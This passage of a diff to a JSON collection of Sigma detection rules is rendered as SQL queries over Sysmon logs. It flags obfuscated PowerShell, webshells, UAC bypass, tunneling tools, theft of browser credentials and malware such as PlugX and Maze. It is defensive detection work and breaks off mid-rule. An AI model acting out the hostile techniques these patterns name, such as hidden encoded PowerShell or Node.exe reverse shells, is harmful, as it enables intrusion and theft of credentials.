"9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" - }, - { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "status": "test", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ + "attack.privilege_escalation", "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.t1033" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "status": "test", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_pua_chisel.yml" - }, - { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image 